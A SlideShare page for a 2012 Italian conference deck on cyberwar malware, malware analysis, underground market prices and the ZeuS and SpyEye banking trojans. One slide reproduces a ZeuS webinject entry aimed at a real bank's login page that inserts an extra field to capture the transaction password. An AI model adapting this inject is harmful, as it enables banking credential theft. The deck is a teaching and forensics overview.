SlideShare une entreprise Scribd logo

Crimini Informatici 2012

Gianni Amato
Gianni Amato
1  sur  44
Télécharger pour lire hors ligne
Crimini Informatici 2012 Indagini Digitali in ambito Giudiziario e Forense Terrorismo, spionaggio ed esercito di botnet. La cyberguerra è già in atto. Le sofisticate armi digitali, accuratamente progettate per colpire obiettivi specifici, rappresentano la minaccia più preoccupante che sia stata mai affrontata.
Who is? ● Author: Gianni Amato ● Site: www.securityside.it ● Blog: www.gianniamato.it ● Email: amato@securityside.it ● Twitter: @guelfoweb IT Security and Forensics Consultant. Specialized in Cybercrime Intelligence for Internet Industry and Government Agencies.
Cosa è il Cybercrime ● Un crimine come tutti gli altri, con l'aggiunta della componente informatica ● La componente informatica può essere il mezzo o l'obiettivo del crimine (o entrambi)
Cominciamo dalla Cyberwar
L'apocalisse Cosa comporterebbe un ipotetico cyber attacco alle infrastrutture critiche ✔ Prenotazioni online di treni e aerei bloccate ✔ Sistemi di controllo di linee aeree e treni in tilt ✔ Le comunicazioni email interrotte ✔ Caos nelle Pubbliche Amministrazioni ✔ Raffinerie e Oleodotti fuori controllo ✔ Acqua, gas, rete elettrica fuori uso
Terrorismo? ● Si, è importante prestare attenzione a tutte le forme di terrorismo. In particolare al terrorismo psicologico.
Impossibile che accada? ● No, la Cyberwar è già iniziata. Una guerra digitale tra nazioni notoriamente in contrasto. – 2010: Stuxnet – 2011: Duqu – 2011: Gauss – 2012: Mahdi – 2012: Flame – 2012: Wiper – 2012: Shamoon
Chi potrebbero essere gli artefici? ● Chiunque! – Dai servizi segreti ai gruppi di estremisti – Dai militari ai terroristi – Nazioni in contrasto da anni
2010: Stuxnet ● Scoperto nel giugno 2010 ● Obiettivo: Sabotare il programma nucleare Iraniano – Sistemi SCADA ● Windows + WinCC + PCS 7 ● Progetto USA “Operation Olympic Games” iniziato da George W. Bush – Si diffonde via USB – Sfrutta vulnerabilità 0-day
2010: Stuxnet ● La password dei sistemi SCADA (DB WinCC) era conosciuta da oltre 2 anni. Fu pubblicata in un forum e poi rimossa dal moderatore ● Gli autori erano in possesso di certificati digitali: Realtek e JMicron ● Verisign revoca i certificati il 16 luglio ● Il 17 luglio viene rilevata una nuova versione di Stuxnet con i certificati rubati a Jmicron
2010: Stuxnet ● Il valore numerico '1979050' trovato nel registro di sistema delle macchine compromesse da Stuxnet è stato interpretato come la possibile data di nascita di uno degli autori: 09/05/1979 ● E' stato appurato che la data rilevata all'interno del codice di Stuxnet '24/6/12' coincide esattamente con la data del suo decesso
2011: Duqu ● Scoperto nel settembre 2011 ● Condivide codice di Stuxnet (?) ● Il target ancora una volta è l'Iran: valutare lo stato del programma nucleare ● Obiettivo diverso: furto di informazioni ● Utilizza certificati rubati ● Ha funzioni di keylogger ● Sfrutta vulnerabilità 0-day (kernel Windows)
2011: Gauss ● Scoperto nel settembre 2011 ● Rilevato in Libano, Israele, Palestina, Stati Uniti e Emirati Arabi ● Obiettivo: furto di password e conti bancari ● Si ipotizza sia stato creato dagli stessi autori di Stuxnet e Duqu
2012: Mahdi ● Scoperto nel febbraio 2012 ● Il nome deriva da stringhe trovate nel codice che fanno riferimento al Messia Islamico ● Non si conoscono gli autori ● Ha funzioni di keylogger e cattura schermate ● Ruba file audio, file di testo e immagini ● Sfrutta bug di Word e Power Point
2012: Flame ● Scoperto nell'aprile 2012 ● Individuato da Kaspersky Lab in Iran (Iranian Oil Minestry ● CrySyS Lab sostiene che il malware potrebbe essere online dal 2007 ● Si propaga tramite USB Key, nella rete locale grazie ad una vulnerabilità di Windows nei sistemi con stampante condivisa ● Usa un falso certificato digitale
2012: Flame ● Ha funzioni di keylogger ● Cattura immagini ● Registra l'audio (conversazioni via Skype) ● Ruba documenti di testo e file DWG (Progetti AutoCad) ● Rilevate somiglianze con Stuxnet e Duqu ma con un obiettivo diverso: spionaggio industriale
2012: Flame risale al 2008? http://www.crysys.hu/skywiper/skywiper.pdf ● $ python peframe.py --export mssecmgr.ocx ● [IMAGE_EXPORT_DIRECTORY] ● 0x5F694 0x0 Characteristics: 0x0 ● 0x5F698 0x4 TimeDateStamp: 0x493EA336 [Tue Dec 9 16:56:22 2008 UTC] ● 0x5F69C 0x8 MajorVersion: 0x0 ● 0x5F69E 0xA MinorVersion: 0x0 ● 0x5F6A0 0xC Name: 0x13C4EE ● 0x5F6A4 0x10 Base: 0x1 ● 0x5F6A8 0x14 NumberOfFunctions: 0x5 ● 0x5F6AC 0x18 NumberOfNames: 0x5 ● 0x5F6B0 0x1C AddressOfFunctions: 0x13C4BC ● 0x5F6B4 0x20 AddressOfNames: 0x13C4D0 ● 0x5F6B8 0x24 AddressOfNameOrdinals: 0x13C4E4
2012: Wiper ● Un soldato inviato sul campo di battaglia per ripulire le tracce ● Ha lo scopo di cancellare tutte le tracce lasciate da Stuxnet e Duqu ● La priorità di rimuovere le informazioni è data ai file .PNF (usati da Stuxnet) ● Rimuove inoltre tutti dati utili ai tecnici forensi (non è un caso)
2012: Shamoon ● Scoperto nel mese di agosto 2012 ● Shamoon è il nome trovato nel codice ● Progettato per lo spionaggio ● Ha preso di mira un ente petrolifero di Stato Saudita ● Cancella i dati del pc infetto sostituendoli con delle immagini (una bandiera americana) ● I file originali vengono verso un server sconosciuto
Perchè analizzare un Malware? L'analisi è una procedura che va eseguita in laboratorio - quando è possibile - e consente di ricostruire la logica del malware per rispondere ai quattro quesiti che si presentano quando una macchina viene compromessa.
I 4 Quesiti ● 1. Qual è lo scopo del malware? ● 2. Quali informazioni è riuscito a carpire? ● 3. Dove sono state trasmesse le informazioni? ● 4. Come ha fatto ad arrivare fin qui?
Con cosa abbiamo a che fare? ● Persone altamente competenti ● Codice è offuscato ● Crittorgrafia (soprattutto durante la trasmissione dei dati) ● Funzioni di rootkit ● Vulnerabilità 0-day
Tipi di Analisi ● Analisi Statica ● Analisi Dinamica – Codice – Comportamento – Signature – Mutazioni – Evidence – Connessioni
Remote Access Trojan
Malware Anti-Analysis ● Anti Online-Analysis ● Anti Virtualizzation – ThreatExpert – VMware – CWSandbox – Virtualbox – Anubis – Virtual PC ● Anti Debug/Disass. – Softice – OllyDbg – IDA Pro
Torniamo al Cybercrime
Vulnerabilità Condivise
Acquisti nell'Underground Russo ● Hacking a Gmail account: $162 ● Hacking a corporate mailbox: $500) ● Scans of legitimate passports: $5 each ● Winlocker ransomware: $10-20 ● Unintelligent exploit bundle: $25 ● Intelligent exploit bundle: $10-3,000 ● Traffic: $7-15 per 1,000 visitors for the most valuable traffic (from the US and EU)
Acquisti nell'Underground Russo ● Basic crypter (for inserting rogue code into a benign file): $10-30 ● SOCKS bot (to get around firewalls): $100 ● Hiring a DDoS attack: $30-70 for a day, $1,200 for a month ● Email spam: $10 per one million e-mails ● Expensive email spam (using a customer database): $50-500 per one million e-mails
Acquisti nell'Underground Russo ● SMS spam: $3-150 per 100-100,000 messages ● Bots for a botnet: $200 for 2,000 bots ● DDoS botnet: $700 ● ZeuS source code: $200-$500 ● Windows rootkit (for installing malicious drivers): $292 ● Hacking a Facebook or Twitter account: $130
ZeuS Un progetto criminale (ora) Open Source
ZeuS Info ● Online dal 2006 ● Scritto in Visual C++ ● Gli autori non amano chiamarlo Trojan, Backdoor o Virus. Lo chiamano semplicemente “Bot” ● Prende di mira i sistemi MS Windows ● Basato sulle intercettazioni delle WinAPI
ZeuS Ring ● Ring3 – Garantisce adattabilità e scalabilità – Può operare in Guest User
ZeuS Client Features ● Sniffer di traffico su protocollo TCP ● Intercettazione di login FTP ● Intercettazione di login POP3 ● Intercetta le chiamate alla libreria Wininet.dll (usata da Internet Explorer) e nspr4.dll (usata da Firefox) per connessioni HTTP e HTTPS ● Encryption 1024-bit RSA
ZeuS Server Features ● Usa Socks 4/4a/5 con supporto UDP e IPv6 ● Connessioni alla macchina infetta via FTP o RDP ● Screenshot in real time ● Esecuzione comandi da remoto
ZeuS HTTP-inject/HTTP-grabber webinjects.txt set_url https://privati.internetbanking.bancaintesa.it/sm/login/IN/box_login.jsp GP data_before name="PASSWORD"*<tr> data_end data_inject <td height="32" class="grigio10">password dispositiva <br/> <input name="PASSDIS" type="password" size="12" onkeypress="javascript:entsub('PASSWORD', event);" tabindex="2" style="width: 110px;"/></td> <td><img alt="" src="/static/i/spaziatore.gif" width="10"/></td> data_end data_after data_end
ZeuS HTTP-inject/HTTP-grabber Before - After
ZeuS Installation ✔ Apache ✔ PHP ✔ MySql
ZeuS Control Panel
ZeuS Botnet
Arriva la Concorrenza La prima versione di SpyEye con opzione Kill Zeus Nato per accaparrarsi una fetta del mercato di ZeuS
SpyEye ● Presente dal 2009 ● Progettato dai Russi ● Ha un costo di 500$ al mercato nero ● Il business maggiore è basato sui plugin
SpyEye + ZeuS ● Brute force password guessing ● Jabber notification ● VNC module ● Auto-spreading ● Auto-update ● Screenshot system
Domande?

Recommandé

Amato HackInBo 2013
Amato HackInBo 2013Amato HackInBo 2013
Amato HackInBo 2013Gianni Amato
 
Il Ransomware nelle Aziende - Eset Security Days 2016
Il Ransomware nelle Aziende - Eset Security Days 2016Il Ransomware nelle Aziende - Eset Security Days 2016
Il Ransomware nelle Aziende - Eset Security Days 2016Gianni Amato
 
Operazioni mirate e malware di Stato nell'era della guerra cibernetica e del ...
Operazioni mirate e malware di Stato nell'era della guerra cibernetica e del ...Operazioni mirate e malware di Stato nell'era della guerra cibernetica e del ...
Operazioni mirate e malware di Stato nell'era della guerra cibernetica e del ...Gianni Amato
 
Il venerdì nero di wannacry
Il venerdì nero di wannacryIl venerdì nero di wannacry
Il venerdì nero di wannacryGianni Amato
 
Ransomware ma NON solo… ecco come si stanno evolvendo le minacce nel 2018
Ransomware ma NON solo… ecco come si stanno evolvendo le minacce nel 2018Ransomware ma NON solo… ecco come si stanno evolvendo le minacce nel 2018
Ransomware ma NON solo… ecco come si stanno evolvendo le minacce nel 2018Gianfranco Tonello
 
Reati Informatici e Investigazioni Digitali
Reati Informatici e Investigazioni DigitaliReati Informatici e Investigazioni Digitali
Reati Informatici e Investigazioni DigitaliGianni Amato
 
Virus di ieri e virus/malware di oggi… quali pericoli per le aziende, gli ent...
Virus di ieri e virus/malware di oggi… quali pericoli per le aziende, gli ent...Virus di ieri e virus/malware di oggi… quali pericoli per le aziende, gli ent...
Virus di ieri e virus/malware di oggi… quali pericoli per le aziende, gli ent...Gianfranco Tonello
 
Stato dell’arte delle truffe bancarie dal phishing ai Trojan.Banker, come si ...
Stato dell’arte delle truffe bancarie dal phishing ai Trojan.Banker, come si ...Stato dell’arte delle truffe bancarie dal phishing ai Trojan.Banker, come si ...
Stato dell’arte delle truffe bancarie dal phishing ai Trojan.Banker, come si ...Gianfranco Tonello
 

Recommandé

Amato HackInBo 2013
Amato HackInBo 2013Amato HackInBo 2013
Amato HackInBo 2013Gianni Amato
 
Il Ransomware nelle Aziende - Eset Security Days 2016
Il Ransomware nelle Aziende - Eset Security Days 2016Il Ransomware nelle Aziende - Eset Security Days 2016
Il Ransomware nelle Aziende - Eset Security Days 2016Gianni Amato
 
Operazioni mirate e malware di Stato nell'era della guerra cibernetica e del ...
Operazioni mirate e malware di Stato nell'era della guerra cibernetica e del ...Operazioni mirate e malware di Stato nell'era della guerra cibernetica e del ...
Operazioni mirate e malware di Stato nell'era della guerra cibernetica e del ...Gianni Amato
 
Il venerdì nero di wannacry
Il venerdì nero di wannacryIl venerdì nero di wannacry
Il venerdì nero di wannacryGianni Amato
 
Ransomware ma NON solo… ecco come si stanno evolvendo le minacce nel 2018
Ransomware ma NON solo… ecco come si stanno evolvendo le minacce nel 2018Ransomware ma NON solo… ecco come si stanno evolvendo le minacce nel 2018
Ransomware ma NON solo… ecco come si stanno evolvendo le minacce nel 2018Gianfranco Tonello
 
Reati Informatici e Investigazioni Digitali
Reati Informatici e Investigazioni DigitaliReati Informatici e Investigazioni Digitali
Reati Informatici e Investigazioni DigitaliGianni Amato
 
Virus di ieri e virus/malware di oggi… quali pericoli per le aziende, gli ent...
Virus di ieri e virus/malware di oggi… quali pericoli per le aziende, gli ent...Virus di ieri e virus/malware di oggi… quali pericoli per le aziende, gli ent...
Virus di ieri e virus/malware di oggi… quali pericoli per le aziende, gli ent...Gianfranco Tonello
 
Stato dell’arte delle truffe bancarie dal phishing ai Trojan.Banker, come si ...
Stato dell’arte delle truffe bancarie dal phishing ai Trojan.Banker, come si ...Stato dell’arte delle truffe bancarie dal phishing ai Trojan.Banker, come si ...
Stato dell’arte delle truffe bancarie dal phishing ai Trojan.Banker, come si ...Gianfranco Tonello
 
Dal cyber-crime al cyber-warfare: le minacce per aziende e governi derivanti ...
Dal cyber-crime al cyber-warfare: le minacce per aziende e governi derivanti ...Dal cyber-crime al cyber-warfare: le minacce per aziende e governi derivanti ...
Dal cyber-crime al cyber-warfare: le minacce per aziende e governi derivanti ...Danilo De Rogatis
 
NFC: Tecnologia e Sicurezza
NFC: Tecnologia e SicurezzaNFC: Tecnologia e Sicurezza
NFC: Tecnologia e SicurezzaAndrea Draghetti
 
Workshop sulla Sicurezza Informatica
Workshop sulla Sicurezza InformaticaWorkshop sulla Sicurezza Informatica
Workshop sulla Sicurezza InformaticaNextre Engineering
 
Il tuo router è sicuro?!
Il tuo router è sicuro?!Il tuo router è sicuro?!
Il tuo router è sicuro?!Raffaele Sommese
 
ITDM & PR SOFTWARE vs APT
ITDM & PR SOFTWARE vs APTITDM & PR SOFTWARE vs APT
ITDM & PR SOFTWARE vs APTDaniele Oliverio
 
Anelli forti e ideologie deboli (nella cybersicurezza)
Anelli forti e ideologie deboli (nella cybersicurezza)Anelli forti e ideologie deboli (nella cybersicurezza)
Anelli forti e ideologie deboli (nella cybersicurezza)Carola Frediani
 
Sicurezza in rete: Hacking Team
Sicurezza in rete: Hacking TeamSicurezza in rete: Hacking Team
Sicurezza in rete: Hacking TeamNaLUG
 
Phishing - Analisi, Simulazione e Contromisure
Phishing - Analisi, Simulazione e ContromisurePhishing - Analisi, Simulazione e Contromisure
Phishing - Analisi, Simulazione e ContromisureAndrea Draghetti
 
Deep web: il mondo sommerso della rete
Deep web: il mondo sommerso della reteDeep web: il mondo sommerso della rete
Deep web: il mondo sommerso della reteFiorenza Polverino
 
CCI2018 - Ethical Hacking, gli step di un attacco e le contromisure
CCI2018 - Ethical Hacking, gli step di un attacco e le contromisureCCI2018 - Ethical Hacking, gli step di un attacco e le contromisure
CCI2018 - Ethical Hacking, gli step di un attacco e le contromisurewalk2talk srl
 
Security and hacking engineering - metodologie di attacco e difesa con strume...
Security and hacking engineering - metodologie di attacco e difesa con strume...Security and hacking engineering - metodologie di attacco e difesa con strume...
Security and hacking engineering - metodologie di attacco e difesa con strume...Marco Ferrigno
 
Identità digitali violate: Phishing
Identità digitali violate: PhishingIdentità digitali violate: Phishing
Identità digitali violate: Phishingdenis frati
 
Reporter
ReporterReporter
ReporterMaxVellucci
 
Valda Quizzy
Valda QuizzyValda Quizzy
Valda QuizzyMaxVellucci
 
La complessità del malware: analisi strutturale ed ambienti di sviluppo
La complessità del malware: analisi strutturale ed ambienti di sviluppoLa complessità del malware: analisi strutturale ed ambienti di sviluppo
La complessità del malware: analisi strutturale ed ambienti di sviluppoMarco Ferrigno
 
Spy game
Spy gameSpy game
Spy gameMaxVellucci
 
Cyber-Crime: i cyber-attacchi più diffusi
Cyber-Crime: i cyber-attacchi più diffusiCyber-Crime: i cyber-attacchi più diffusi
Cyber-Crime: i cyber-attacchi più diffusiManager.it
 
Linuxday 2013-amato
Linuxday 2013-amatoLinuxday 2013-amato
Linuxday 2013-amatoGianni Amato
 
Linuxday 2014 Amato - Shellshock
Linuxday 2014 Amato - ShellshockLinuxday 2014 Amato - Shellshock
Linuxday 2014 Amato - ShellshockGianni Amato
 
Web 2.0 e dintorni
Web 2.0 e dintorniWeb 2.0 e dintorni
Web 2.0 e dintorniGianni Amato
 
Firma Digitale
Firma DigitaleFirma Digitale
Firma DigitaleGianni Amato
 
Hashbot.com - Acquisizione e Validazione
Hashbot.com - Acquisizione e ValidazioneHashbot.com - Acquisizione e Validazione
Hashbot.com - Acquisizione e ValidazioneGianni Amato
 

Contenu connexe

Tendances

Dal cyber-crime al cyber-warfare: le minacce per aziende e governi derivanti ...
Dal cyber-crime al cyber-warfare: le minacce per aziende e governi derivanti ...Dal cyber-crime al cyber-warfare: le minacce per aziende e governi derivanti ...
Dal cyber-crime al cyber-warfare: le minacce per aziende e governi derivanti ...Danilo De Rogatis
 
NFC: Tecnologia e Sicurezza
NFC: Tecnologia e SicurezzaNFC: Tecnologia e Sicurezza
NFC: Tecnologia e SicurezzaAndrea Draghetti
 
Workshop sulla Sicurezza Informatica
Workshop sulla Sicurezza InformaticaWorkshop sulla Sicurezza Informatica
Workshop sulla Sicurezza InformaticaNextre Engineering
 
Anelli forti e ideologie deboli (nella cybersicurezza)
Anelli forti e ideologie deboli (nella cybersicurezza)Anelli forti e ideologie deboli (nella cybersicurezza)
Anelli forti e ideologie deboli (nella cybersicurezza)Carola Frediani
 
Sicurezza in rete: Hacking Team
Sicurezza in rete: Hacking TeamSicurezza in rete: Hacking Team
Sicurezza in rete: Hacking TeamNaLUG
 
Phishing - Analisi, Simulazione e Contromisure
Phishing - Analisi, Simulazione e ContromisurePhishing - Analisi, Simulazione e Contromisure
Phishing - Analisi, Simulazione e ContromisureAndrea Draghetti
 
Deep web: il mondo sommerso della rete
Deep web: il mondo sommerso della reteDeep web: il mondo sommerso della rete
Deep web: il mondo sommerso della reteFiorenza Polverino
 
CCI2018 - Ethical Hacking, gli step di un attacco e le contromisure
CCI2018 - Ethical Hacking, gli step di un attacco e le contromisureCCI2018 - Ethical Hacking, gli step di un attacco e le contromisure
CCI2018 - Ethical Hacking, gli step di un attacco e le contromisurewalk2talk srl
 
Security and hacking engineering - metodologie di attacco e difesa con strume...
Security and hacking engineering - metodologie di attacco e difesa con strume...Security and hacking engineering - metodologie di attacco e difesa con strume...
Security and hacking engineering - metodologie di attacco e difesa con strume...Marco Ferrigno
 

Tendances (11)

Dal cyber-crime al cyber-warfare: le minacce per aziende e governi derivanti ...
Dal cyber-crime al cyber-warfare: le minacce per aziende e governi derivanti ...Dal cyber-crime al cyber-warfare: le minacce per aziende e governi derivanti ...
Dal cyber-crime al cyber-warfare: le minacce per aziende e governi derivanti ...
 
NFC: Tecnologia e Sicurezza
NFC: Tecnologia e SicurezzaNFC: Tecnologia e Sicurezza
NFC: Tecnologia e Sicurezza
 
Workshop sulla Sicurezza Informatica
Workshop sulla Sicurezza InformaticaWorkshop sulla Sicurezza Informatica
Workshop sulla Sicurezza Informatica
 
Il tuo router è sicuro?!
Il tuo router è sicuro?!Il tuo router è sicuro?!
Il tuo router è sicuro?!
 
ITDM & PR SOFTWARE vs APT
ITDM & PR SOFTWARE vs APTITDM & PR SOFTWARE vs APT
ITDM & PR SOFTWARE vs APT
 
Anelli forti e ideologie deboli (nella cybersicurezza)
Anelli forti e ideologie deboli (nella cybersicurezza)Anelli forti e ideologie deboli (nella cybersicurezza)
Anelli forti e ideologie deboli (nella cybersicurezza)
 
Sicurezza in rete: Hacking Team
Sicurezza in rete: Hacking TeamSicurezza in rete: Hacking Team
Sicurezza in rete: Hacking Team
 
Phishing - Analisi, Simulazione e Contromisure
Phishing - Analisi, Simulazione e ContromisurePhishing - Analisi, Simulazione e Contromisure
Phishing - Analisi, Simulazione e Contromisure
 
Deep web: il mondo sommerso della rete
Deep web: il mondo sommerso della reteDeep web: il mondo sommerso della rete
Deep web: il mondo sommerso della rete
 
CCI2018 - Ethical Hacking, gli step di un attacco e le contromisure
CCI2018 - Ethical Hacking, gli step di un attacco e le contromisureCCI2018 - Ethical Hacking, gli step di un attacco e le contromisure
CCI2018 - Ethical Hacking, gli step di un attacco e le contromisure
 
Security and hacking engineering - metodologie di attacco e difesa con strume...
Security and hacking engineering - metodologie di attacco e difesa con strume...Security and hacking engineering - metodologie di attacco e difesa con strume...
Security and hacking engineering - metodologie di attacco e difesa con strume...
 

En vedette

Identità digitali violate: Phishing
Identità digitali violate: PhishingIdentità digitali violate: Phishing
Identità digitali violate: Phishingdenis frati
 
La complessità del malware: analisi strutturale ed ambienti di sviluppo
La complessità del malware: analisi strutturale ed ambienti di sviluppoLa complessità del malware: analisi strutturale ed ambienti di sviluppo
La complessità del malware: analisi strutturale ed ambienti di sviluppoMarco Ferrigno
 
Cyber-Crime: i cyber-attacchi più diffusi
Cyber-Crime: i cyber-attacchi più diffusiCyber-Crime: i cyber-attacchi più diffusi
Cyber-Crime: i cyber-attacchi più diffusiManager.it
 
Linuxday 2013-amato
Linuxday 2013-amatoLinuxday 2013-amato
Linuxday 2013-amatoGianni Amato
 
Linuxday 2014 Amato - Shellshock
Linuxday 2014 Amato - ShellshockLinuxday 2014 Amato - Shellshock
Linuxday 2014 Amato - ShellshockGianni Amato
 
Web 2.0 e dintorni
Web 2.0 e dintorniWeb 2.0 e dintorni
Web 2.0 e dintorniGianni Amato
 
Hashbot.com - Acquisizione e Validazione
Hashbot.com - Acquisizione e ValidazioneHashbot.com - Acquisizione e Validazione
Hashbot.com - Acquisizione e ValidazioneGianni Amato
 
ARM 7: ThaiCERT Operations and Priorities
ARM 7: ThaiCERT Operations and PrioritiesARM 7: ThaiCERT Operations and Priorities
ARM 7: ThaiCERT Operations and PrioritiesAPNIC
 
Network forensics: un approccio laterale
Network forensics: un approccio lateraleNetwork forensics: un approccio laterale
Network forensics: un approccio lateraleDavide Paltrinieri
 
Introduction to Memory Analysis
Introduction to Memory AnalysisIntroduction to Memory Analysis
Introduction to Memory AnalysisEmil Tan
 
Nuove minacce nella Cyber Security, come proteggersi
Nuove minacce nella Cyber Security, come proteggersiNuove minacce nella Cyber Security, come proteggersi
Nuove minacce nella Cyber Security, come proteggersiSimone Onofri
 
Botnet e nuove forme di malware
Botnet e nuove forme di malwareBotnet e nuove forme di malware
Botnet e nuove forme di malwareGianni Amato
 
Risk Analysis Of Banking Malware Attacks
Risk Analysis Of Banking Malware AttacksRisk Analysis Of Banking Malware Attacks
Risk Analysis Of Banking Malware AttacksMarco Morana
 
La Cyber Security spiegata al capo.
La Cyber Security spiegata al capo.La Cyber Security spiegata al capo.
La Cyber Security spiegata al capo.Carlo Balbo
 

En vedette (20)

Identità digitali violate: Phishing
Identità digitali violate: PhishingIdentità digitali violate: Phishing
Identità digitali violate: Phishing
 
Reporter
ReporterReporter
Reporter
 
Valda Quizzy
Valda QuizzyValda Quizzy
Valda Quizzy
 
La complessità del malware: analisi strutturale ed ambienti di sviluppo
La complessità del malware: analisi strutturale ed ambienti di sviluppoLa complessità del malware: analisi strutturale ed ambienti di sviluppo
La complessità del malware: analisi strutturale ed ambienti di sviluppo
 
Spy game
Spy gameSpy game
Spy game
 
Cyber-Crime: i cyber-attacchi più diffusi
Cyber-Crime: i cyber-attacchi più diffusiCyber-Crime: i cyber-attacchi più diffusi
Cyber-Crime: i cyber-attacchi più diffusi
 
Linuxday 2013-amato
Linuxday 2013-amatoLinuxday 2013-amato
Linuxday 2013-amato
 
Linuxday 2014 Amato - Shellshock
Linuxday 2014 Amato - ShellshockLinuxday 2014 Amato - Shellshock
Linuxday 2014 Amato - Shellshock
 
Web 2.0 e dintorni
Web 2.0 e dintorniWeb 2.0 e dintorni
Web 2.0 e dintorni
 
Firma Digitale
Firma DigitaleFirma Digitale
Firma Digitale
 
Hashbot.com - Acquisizione e Validazione
Hashbot.com - Acquisizione e ValidazioneHashbot.com - Acquisizione e Validazione
Hashbot.com - Acquisizione e Validazione
 
ARM 7: ThaiCERT Operations and Priorities
ARM 7: ThaiCERT Operations and PrioritiesARM 7: ThaiCERT Operations and Priorities
ARM 7: ThaiCERT Operations and Priorities
 
Network forensics: un approccio laterale
Network forensics: un approccio lateraleNetwork forensics: un approccio laterale
Network forensics: un approccio laterale
 
Introduction to Memory Analysis
Introduction to Memory AnalysisIntroduction to Memory Analysis
Introduction to Memory Analysis
 
Nuove minacce nella Cyber Security, come proteggersi
Nuove minacce nella Cyber Security, come proteggersiNuove minacce nella Cyber Security, come proteggersi
Nuove minacce nella Cyber Security, come proteggersi
 
Botnet e nuove forme di malware
Botnet e nuove forme di malwareBotnet e nuove forme di malware
Botnet e nuove forme di malware
 
Malware Analysis
Malware AnalysisMalware Analysis
Malware Analysis
 
ATP
ATPATP
ATP
 
Risk Analysis Of Banking Malware Attacks
Risk Analysis Of Banking Malware AttacksRisk Analysis Of Banking Malware Attacks
Risk Analysis Of Banking Malware Attacks
 
La Cyber Security spiegata al capo.
La Cyber Security spiegata al capo.La Cyber Security spiegata al capo.
La Cyber Security spiegata al capo.
 

Similaire à Crimini Informatici 2012

virus informatici.pdf
virus informatici.pdfvirus informatici.pdf
virus informatici.pdfSveva7
 
Security and hacking Engineering
Security and hacking EngineeringSecurity and hacking Engineering
Security and hacking EngineeringNaLUG
 
Pillole di IoT
Pillole di IoTPillole di IoT
Pillole di IoTmircfe
 
I punti deboli della sicurezza IT (da non sottovalutare)
I punti deboli della sicurezza IT (da non sottovalutare)I punti deboli della sicurezza IT (da non sottovalutare)
I punti deboli della sicurezza IT (da non sottovalutare)festival ICT 2016
 
Come Funziona Il Ransomware LockBit? Decrittazione E Recupero Dati.pdf
Come Funziona Il Ransomware LockBit? Decrittazione E Recupero Dati.pdfCome Funziona Il Ransomware LockBit? Decrittazione E Recupero Dati.pdf
Come Funziona Il Ransomware LockBit? Decrittazione E Recupero Dati.pdfHelpRansomware
 
Come Funziona Il Ransomware LockBit.pdf
Come Funziona Il Ransomware LockBit.pdfCome Funziona Il Ransomware LockBit.pdf
Come Funziona Il Ransomware LockBit.pdfHelpRansomware
 
Evento 18 giugno - Ibm sicurezza - parte a - problematiche
Evento 18 giugno - Ibm sicurezza - parte a - problematiche Evento 18 giugno - Ibm sicurezza - parte a - problematiche
Evento 18 giugno - Ibm sicurezza - parte a - problematiche PRAGMA PROGETTI
 
Matteo Flora: Cyber Warfare e CyberGuerrilla
Matteo Flora: Cyber Warfare e CyberGuerrillaMatteo Flora: Cyber Warfare e CyberGuerrilla
Matteo Flora: Cyber Warfare e CyberGuerrillaMatteo Flora
 
Seminario di informatica 2
Seminario di informatica 2Seminario di informatica 2
Seminario di informatica 2Andrea Barilli
 
Ransomware Sodinokibi: Cos'è, Come Funziona E Come Decriptarlo.pdf
Ransomware Sodinokibi: Cos'è, Come Funziona E Come Decriptarlo.pdfRansomware Sodinokibi: Cos'è, Come Funziona E Come Decriptarlo.pdf
Ransomware Sodinokibi: Cos'è, Come Funziona E Come Decriptarlo.pdfHelpRansomware
 
Internet-of-things, sicurezza, privacy, trust
Internet-of-things, sicurezza, privacy, trustInternet-of-things, sicurezza, privacy, trust
Internet-of-things, sicurezza, privacy, trustDavide Carboni
 
Come recuperare file crittografati da diversi dispositivi [2022].pdf
Come recuperare file crittografati da diversi dispositivi [2022].pdfCome recuperare file crittografati da diversi dispositivi [2022].pdf
Come recuperare file crittografati da diversi dispositivi [2022].pdfHelpRansomware
 
Linux, sicurezza & social hacking
Linux, sicurezza & social hackingLinux, sicurezza & social hacking
Linux, sicurezza & social hackingFabio Mora
 
Webinar 2020.04.07- Pillole di sicurezza digitale
Webinar 2020.04.07- Pillole di sicurezza digitaleWebinar 2020.04.07- Pillole di sicurezza digitale
Webinar 2020.04.07- Pillole di sicurezza digitaleMario Rossano
 
Come recuperare file crittografati da diversi dispositivi [2022].pdf
Come recuperare file crittografati da diversi dispositivi [2022].pdfCome recuperare file crittografati da diversi dispositivi [2022].pdf
Come recuperare file crittografati da diversi dispositivi [2022].pdfHelpRansomware
 
SiteLock: Malware, virus e spyware: scopri come proteggere il tuo sito dalle ...
SiteLock: Malware, virus e spyware: scopri come proteggere il tuo sito dalle ...SiteLock: Malware, virus e spyware: scopri come proteggere il tuo sito dalle ...
SiteLock: Malware, virus e spyware: scopri come proteggere il tuo sito dalle ...Register.it
 
Pentesting Android with BackBox 4
Pentesting Android with BackBox 4Pentesting Android with BackBox 4
Pentesting Android with BackBox 4raffaele_forte
 

Similaire à Crimini Informatici 2012 (20)

virus informatici.pdf
virus informatici.pdfvirus informatici.pdf
virus informatici.pdf
 
Security and hacking Engineering
Security and hacking EngineeringSecurity and hacking Engineering
Security and hacking Engineering
 
Pillole di IoT
Pillole di IoTPillole di IoT
Pillole di IoT
 
Privacy in enigmate
Privacy in enigmatePrivacy in enigmate
Privacy in enigmate
 
Privacy e sicurezza
Privacy e sicurezzaPrivacy e sicurezza
Privacy e sicurezza
 
I punti deboli della sicurezza IT (da non sottovalutare)
I punti deboli della sicurezza IT (da non sottovalutare)I punti deboli della sicurezza IT (da non sottovalutare)
I punti deboli della sicurezza IT (da non sottovalutare)
 
Come Funziona Il Ransomware LockBit? Decrittazione E Recupero Dati.pdf
Come Funziona Il Ransomware LockBit? Decrittazione E Recupero Dati.pdfCome Funziona Il Ransomware LockBit? Decrittazione E Recupero Dati.pdf
Come Funziona Il Ransomware LockBit? Decrittazione E Recupero Dati.pdf
 
Come Funziona Il Ransomware LockBit.pdf
Come Funziona Il Ransomware LockBit.pdfCome Funziona Il Ransomware LockBit.pdf
Come Funziona Il Ransomware LockBit.pdf
 
Evento 18 giugno - Ibm sicurezza - parte a - problematiche
Evento 18 giugno - Ibm sicurezza - parte a - problematiche Evento 18 giugno - Ibm sicurezza - parte a - problematiche
Evento 18 giugno - Ibm sicurezza - parte a - problematiche
 
Matteo Flora: Cyber Warfare e CyberGuerrilla
Matteo Flora: Cyber Warfare e CyberGuerrillaMatteo Flora: Cyber Warfare e CyberGuerrilla
Matteo Flora: Cyber Warfare e CyberGuerrilla
 
Seminario di informatica 2
Seminario di informatica 2Seminario di informatica 2
Seminario di informatica 2
 
Ransomware Sodinokibi: Cos'è, Come Funziona E Come Decriptarlo.pdf
